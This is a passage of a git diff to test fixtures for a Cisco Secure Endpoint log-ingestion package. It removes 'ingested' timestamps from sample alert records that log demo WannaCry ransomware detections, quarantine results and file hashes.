Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4774,7 +4717,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376917383Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4860,7 +4802,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376918349Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4946,7 +4887,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376919317Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5032,7 +4972,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376920276Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5116,7 +5055,6 @@ ], "code": "553648143", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376921529Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 0652bffefcb..89d77b87ac6 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -46,7 +46,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131245933Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -122,7 +121,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131248362Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -198,7 +196,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131249278Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -274,7 +271,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131250102Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -350,7 +346,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131250880Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -426,7 +421,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131251658Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -500,7 +494,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131252412Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -590,7 +583,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131253167Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -687,7 +679,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131253930Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -773,7 +764,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131254690Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -857,7 +847,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131255452Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -929,7 +918,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131256437Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 